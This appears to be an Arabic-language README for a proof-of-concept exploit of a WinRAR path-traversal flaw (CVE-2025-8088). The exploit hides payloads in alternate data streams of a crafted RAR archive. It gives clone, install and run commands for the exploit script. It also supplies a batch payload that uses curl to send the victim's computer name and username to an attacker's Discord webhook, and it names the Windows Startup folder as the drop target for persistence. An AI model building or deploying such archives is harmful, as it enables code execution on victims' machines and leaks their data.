
استغلال ثغرة CVE في Winrar قبل الإصدار 7.13 باستخدام تدفقات ADS متعددة على ملف واحد (تنفيذ PDF مخصص)
استغلال لإثبات المفهوم لثغرة WinRAR (CVE-2025-8088) التي تؤثر على الإصدارات 7.12 والإصدارات الأقدم. تنشئ هذه الأداة أرشيف RAR خبيثًا يضمّن الحمولات في تدفقات البيانات البديلة (ADS) مع اجتياز المسار، مما قد يؤدي إلى تنفيذ تعليمات برمجية عشوائية.
# استنساخ المستودع
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088
# تثبيت التبعيات
pip install reportlab
# تشغيل الاستغلال
python CVE-2025-8088.py
عدّل الحمولة لاستدعاء خطاف Discord:
# استبدل المتغير PAYLOAD في السكربت:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
استبدل YOUR_DISCORD_WEBHOOK_URL برابط الخطاف الفعلي الخاص بك.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\